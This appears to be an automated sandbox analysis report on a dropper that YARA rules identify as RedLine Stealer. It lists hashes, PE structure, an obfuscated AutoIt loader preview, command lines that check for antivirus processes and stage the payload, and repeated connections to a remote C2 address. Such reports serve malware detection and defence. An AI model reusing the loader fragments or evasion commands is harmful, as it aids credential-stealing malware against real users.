Preview:	$ADFxzgQ = FIKvAJS("120^67^89^117^113^70^90^112^98^79^106^106^107^85^113^107^102^116^104^99^98",0)..$rtuXmQb = 194..$paoYUBdOEheCL = 89..Do..Switch $rtuXmQb..Case 192..$emWZAYoGanEDtm = FIKvAJS("107^81^85^126",9), $JYybUPw = FIKvAJS("69^88^74^123^76^107^111",3), $meHCRxEdOMWao = FIKvAJS("113^70^99^107^102^66",1), $uNotfjGWhrhNdYErDEg = FIKvAJS("81^75^113^86^76^107^68^78^121",2)..$lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa = 18..$lKTafmbBiXxBJJEReEATIOukbEfcoLVUdHerbFgEueuvzinptf = 473905+138273..While $lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa < 30..$NvDHUKlezveAk = 40528+631884+524524..$emWZAYoGanEDtm = IsObj(105)..$lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa = $lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa + 1..WEnd..$rtuXmQb = $rtuXmQb + 1..Case 193..$VMFHJRduydSjNz = Execute(FIKvAJS("90^123^121^112^117^110^80^122^77^115^118^104^123^47^46^110^74^73^122^109^128^121^80^115^89^76^90^115^92^46^48",7))..$UGmPKDxtJKxTWvDDVwREdiOUQEEyLApguYiqwELLBIWXfXzK = 11..$DYssecpvFFMkfOvplcc

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1699896
Entropy (8bit):	6.290547513916722
Encrypted:	false
SSDEEP:	24576:0Na0qyFU/vb313JPCGucMBbruVALdpNQHKl3y9UfSj6HYZY8zCixcq:kFU3b3HucMBbrb/qj98deCNq
MD5:	5564A98A4692BA8B2D25770FB834D5F6
SHA1:	129D030D817F6B25D1FDEF2CAD33EB81DE1DEA8B
SHA-256:	28AB9A0F5F50FD5398324B5EC099F5C53C6FAA701C3F6D8B0B3DA47A76C56230
SHA-512:	D803E2E3425095E170910103A4470C598FD4A9A10C1217A006A6393CD1ECA06D1C628E845F6FD1071F1C92778D481F47E4E5F175005FEC2CB0A7519C90992858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: hfrR6WOIt6.exe, Detection: malicious, Browse Filename: services.png.exe, Detection: malicious, Browse Filename: FgfPZQyCMj.exe, Detection: malicious, Browse Filename: Jw1Ua7eGIy, Detection: malicious, Browse Filename: 2019-09-02_22-41-10.exe, Detection: malicious, Browse Filename: 0di3x.exe, Detection: malicious, Browse Filename: S17.exe, Detection: malicious, Browse Filename: S12.exe, Detection: malicious, Browse Filename: 215.exe, Detection: malicious, Browse Filename: S4.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.=FizS.izS.izS.2.P.jzS.}.S.hzS.}.P./zS.}.].q{S.}.V.rzS.}.W..zS.}...hzS.}.Q.hzS.RichizS.........................PE..L..................!.........................0....(K.........................@......,.....@A............................U...............................8`.......Q..0z..p............................................................................text...%........................... ..`RT.................................. ..`PAGE....:.... ...................... ..`.data....Z...0......................@....mrdata.x#.......$..................@....00cfg...............:..............@..@.rsrc................<..............@..@.reloc...Q.......R...>..............@..B................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9568154817195005
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
File size:	1'019'448 bytes
MD5:	af3df67046abb1a4bd2600009fb51f19
SHA1:	4dc05e14c3e44f51a02555d2230e1c2d8219d66f
SHA256:	dc5eb50fd2c6a9351e5b2edb5ab4ddd31f5225ec5260380f05f8cf24e824bffd
SHA512:	51717a3fc744d99e25c255bb5e1e354ba864900e9db57eb8ce84893ebd13f2190a3155482097bf2e70d9c522e8d7e5b853b5b32e3a42157fd702cd89d8df58e8
SSDEEP:	24576:Q14aprl9jOkxoFC6TVAwHTcVrkGSWfavoVi2pB9l0AU0:Q1JZLsYVSgag7XU0
TLSH:	FD252342B0F5807AE2B307728D94FDA08EFDF2B10065465F579818870DB5CD9EE4A76B
File Content Preview:	MZ`.....................@...............................................!..L.!Require Windows..$..................W.......F.......P.......@.........-.....M.......y.......x.....-.........N.....Rich............................PE..L....'.S.................>.

File Icon


Icon Hash:	d0e0689060000000

Static PE Info

General

Entrypoint:	0x414285
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5398270F [Wed Jun 11 09:53:19 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8f56203f7a6a6c416c8f2bb329455dba

Entrypoint Preview

Instruction
call 00007FB3DC85DDF8h
jmp 00007FB3DC85D8ACh
int3
jmp dword ptr [00415284h]
jmp dword ptr [00415288h]
jmp dword ptr [0041528Ch]
int3
int3
push 004142FDh
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004195FCh]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
push 004145BEh
push 004195FCh
call 00007FB3DC85DE06h
add esp, 18h
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007FB3DC85DB7Dh
cmp dword ptr [eax+10h], 03h
jne 00007FB3DC85DB77h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007FB3DC85DB67h
cmp eax, 19930521h
je 00007FB3DC85DB60h
cmp eax, 00000022h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1711c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x2e19	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x308	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13d8a	0x13e00	6223bf6c77107cbf3dfc3cf26635d357	False	0.6020784198113207	data	6.64275010751646	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x316c	0x3200	1bdba6cbf3ac9a64ed4062b575f8fb84	False	0.4328125	data	5.5477475825866875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x2cf8	0x800	7d59497e8d84bbc9a7bbfd7de736eb1b	False	0.3671875	data	3.3581565293291384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1c000	0x2e19	0x3000	87d6d89f77c1bf96935a111e16f8a8b2	False	0.4663899739583333	data	4.756014592934324	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1c1f0	0xdc3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	French	France	0.9463525404484814
RT_ICON	0x1cfb4	0x304	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	French	France	1.0142487046632125
RT_ICON	0x1d2b8	0x9b8	Device independent bitmap graphic, 24 x 48 x 32, image size 2448	French	France	0.11294212218649517
RT_ICON	0x1dc70	0x6cc	Device independent bitmap graphic, 20 x 40 x 32, image size 1700	French	France	0.1425287356321839
RT_ICON	0x1e33c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	French	France	0.16578014184397163
RT_GROUP_ICON	0x1e7a4	0x4c	data	French	France	0.8026315789473685
RT_VERSION	0x1e7f0	0x320	data			0.4575
RT_MANIFEST	0x1eb10	0x309	ASCII text			0.5353925353925354

Imports

DLL	Import
COMCTL32.dll
KERNEL32.dll	SetFileAttributesW, Sleep, GetExitCodeThread, CreateThread, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, lstrlenA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrcmpiW, GetEnvironmentVariableW, SetCurrentDirectoryW, lstrcmpW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, GetCurrentDirectoryW, GetTempPathW, WideCharToMultiByte, CompareFileTime, ExpandEnvironmentStringsW, GetSystemTimeAsFileTime, LoadLibraryA, SetEnvironmentVariableW, WriteFile, CreateFileW, GetDriveTypeW, GetModuleFileNameW, GetCommandLineW, GetModuleHandleW, GetComputerNameW, LoadLibraryW, CreateEventW, SetLastError, ResetEvent, InitializeCriticalSection, LockResource, LoadResource, FindResourceA, MulDiv, GetCurrentThreadId, GetSystemDirectoryW, TerminateThread, ResumeThread, SuspendThread, LocalFree, lstrcpyW, FormatMessageW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, VirtualAlloc, VirtualFree, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, GetFileInformationByHandle, WaitForMultipleObjects, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, GetModuleHandleA, SetUnhandledExceptionFilter, GetStartupInfoA, InterlockedCompareExchange, InterlockedExchange, GetLastError, WaitForSingleObject, CloseHandle, GetProcAddress, lstrlenW, SetEvent, UnhandledExceptionFilter
USER32.dll	DefWindowProcW, KillTimer, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, CallWindowProcW, EnableMenuItem, ReleaseDC, wvsprintfW, GetWindowLongW, SetWindowLongW, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, GetWindowDC, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, IsWindow, UnhookWindowsHookEx, SendMessageW, EndDialog, CharUpperW, ShowWindow, SetWindowPos, SystemParametersInfoW, GetSystemMetrics, GetSystemMenu, SetFocus, ScreenToClient, GetWindowRect, DrawTextW, GetParent, wsprintfW, GetWindowTextW, GetWindowTextLengthW, SetWindowTextW
GDI32.dll	CreateFontIndirectW, SelectObject, GetDeviceCaps, GetObjectW, DeleteObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	CoCreateInstance, CoInitializeEx
OLEAUT32.dll	VariantClear, SysAllocStringLen
msvcrt.dll	memcpy, strncpy, wcsncpy, wcsncmp, wcscmp, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, _beginthreadex, __CxxFrameHandler3, _CxxThrowException, malloc, free, wcsstr, _unlock, __dllonexit, _lock, _onexit, ??1type_info@@UAE@XZ, __getmainargs, _cexit, _exit, _XcptFilter, _ismbblead, exit, _acmdln, _initterm, _amsg_exit, __setusermatherr, __p__commode, __p__fmode, __set_app_type, _except_handler4_common, ?terminate@@YAXXZ, _controlfp, memmove, _wcsnicmp, _purecall, memset, _wtol, ??3@YAXPAX@Z, memcmp, ??2@YAPAXI@Z

Version Infos

Description	Data
CompanyName	wj32
FileDescription	Sandboxie Support for Process Hacker
FileVersion	1.0
InternalName	SbieSupport
LegalCopyright	Licensed under the GNU GPL, v3.
OriginalFilename	SbieSupport.dll
ProductName	Sandboxie Support for Process Hacker
ProductVersion	1.0
Translation	0x0c09 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	France

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 9, 2025 07:25:10.555996895 CET	49721	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:10.562544107 CET	49441	49721	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:10.562649012 CET	49721	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:10.571755886 CET	49721	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:10.578397989 CET	49441	49721	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:12.215594053 CET	49441	49721	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:12.215694904 CET	49721	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:12.396332979 CET	49721	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:17.596090078 CET	49722	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:17.601681948 CET	49441	49722	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:17.601778030 CET	49722	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:17.601954937 CET	49722	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:17.607067108 CET	49441	49722	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:19.227976084 CET	49441	49722	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:19.228071928 CET	49722	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:19.228347063 CET	49722	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:24.269829988 CET	49723	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:24.275222063 CET	49441	49723	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:24.275355101 CET	49723	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:24.277381897 CET	49723	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:24.282448053 CET	49441	49723	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:25.919622898 CET	49441	49723	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:25.919708967 CET	49723	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:25.919934034 CET	49723	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:30.923259020 CET	49724	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:30.928591013 CET	49441	49724	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:30.928689957 CET	49724	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:30.928867102 CET	49724	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:30.933981895 CET	49441	49724	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:32.554018974 CET	49441	49724	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:32.554111958 CET	49724	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:32.554300070 CET	49724	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:37.564471960 CET	49725	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:37.569755077 CET	49441	49725	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:37.569835901 CET	49725	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:37.570059061 CET	49725	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:37.575176001 CET	49441	49725	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:39.194924116 CET	49441	49725	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:39.195167065 CET	49725	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:39.195274115 CET	49725	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:44.205310106 CET	49726	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:44.210660934 CET	49441	49726	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:44.210773945 CET	49726	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:44.210973024 CET	49726	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:44.216157913 CET	49441	49726	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:45.835972071 CET	49441	49726	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:45.836280107 CET	49726	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:45.836623907 CET	49726	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:50.845571995 CET	49727	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:50.851170063 CET	49441	49727	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:50.851277113 CET	49727	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:50.851445913 CET	49727	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:50.857301950 CET	49441	49727	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:52.476422071 CET	49441	49727	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:52.476591110 CET	49727	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:52.477226973 CET	49727	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:57.486617088 CET	49728	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:57.492027044 CET	49441	49728	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:57.492245913 CET	49728	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:57.492465019 CET	49728	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:57.497807980 CET	49441	49728	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:59.133117914 CET	49441	49728	45.67.231.189	192.168.2.4
Mar 9, 2025 07:25:59.133449078 CET	49728	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:25:59.133655071 CET	49728	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:04.142561913 CET	49729	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:04.147897005 CET	49441	49729	45.67.231.189	192.168.2.4
Mar 9, 2025 07:26:04.148009062 CET	49729	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:04.148317099 CET	49729	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:04.153315067 CET	49441	49729	45.67.231.189	192.168.2.4
Mar 9, 2025 07:26:05.793519020 CET	49441	49729	45.67.231.189	192.168.2.4
Mar 9, 2025 07:26:05.795686007 CET	49729	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:05.795964003 CET	49729	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:10.799377918 CET	49730	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:10.804738045 CET	49441	49730	45.67.231.189	192.168.2.4
Mar 9, 2025 07:26:10.804902077 CET	49730	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:10.805128098 CET	49730	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:10.810180902 CET	49441	49730	45.67.231.189	192.168.2.4
Mar 9, 2025 07:26:12.451510906 CET	49441	49730	45.67.231.189	192.168.2.4
Mar 9, 2025 07:26:12.451626062 CET	49730	49441	192.168.2.4	45.67.231.189
Mar 9, 2025 07:26:12.451893091 CET	49730	49441	192.168.2.4	45.67.231.189

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 9, 2025 07:24:14.048974991 CET	58132	53	192.168.2.4	1.1.1.1
Mar 9, 2025 07:24:14.057312012 CET	53	58132	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 9, 2025 07:24:14.048974991 CET	192.168.2.4	1.1.1.1	0x1cdb	Standard query (0)	xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 9, 2025 07:24:14.057312012 CET	1.1.1.1	192.168.2.4	0x1cdb	Name error (3)	xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	01:24:11
Start date:	09/03/2025
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe"
Imagebase:	0x400000
File size:	1'019'448 bytes
MD5 hash:	AF3DF67046ABB1A4BD2600009FB51F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:24:11
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:	0xbd0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:24:11
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:24:11
Start date:	09/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "imagename eq BullGuardCore.exe"
Imagebase:	0x150000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	find /I /N "bullguardcore.exe"
Imagebase:	0xbf0000
File size:	14'848 bytes
MD5 hash:	15B158BC998EEF74CFDD27C44978AEA0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "imagename eq PSUAService.exe"
Imagebase:	0x150000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	find /I /N "psuaservice.exe"
Imagebase:	0xbf0000
File size:	14'848 bytes
MD5 hash:	15B158BC998EEF74CFDD27C44978AEA0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp
Imagebase:	0xf70000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif
Wow64 process (32bit):	true
Commandline:	Rarissima.exe.pif u
Imagebase:	0x950000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:24:12
Start date:	09/03/2025
Path:	C:\Windows\SysWOW64\waitfor.exe
Wow64 process (32bit):	true
Commandline:	waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw
Imagebase:	0x440000
File size:	32'768 bytes
MD5 hash:	E58E152B44F20DD099C5105DE482DF24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:25:03
Start date:	09/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):	true
